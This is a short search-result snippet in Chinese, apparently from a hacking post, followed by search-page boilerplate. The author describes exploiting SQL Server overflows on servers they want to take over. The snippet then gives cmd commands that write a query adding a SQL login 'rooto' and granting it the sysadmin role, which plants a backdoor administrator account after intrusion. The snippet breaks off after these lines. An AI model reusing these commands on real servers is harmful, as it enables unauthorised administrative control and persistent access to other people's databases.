有的服务器可以用sql溢出,可惜就是找不到进一步的入侵方法,因而一直也没有拿下来。今天在校盟看到一篇文章,说是在cmd下也可以中入sql账号和密码,方法如下: echo exec master.dbo.sp_addlogin 'rooto','*****' >test.qry echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry ...
一些您可能无法访问的结果已被隐去。
显示无法访问的结果一些您可能无法访问的结果已被隐去。
显示无法访问的结果
反馈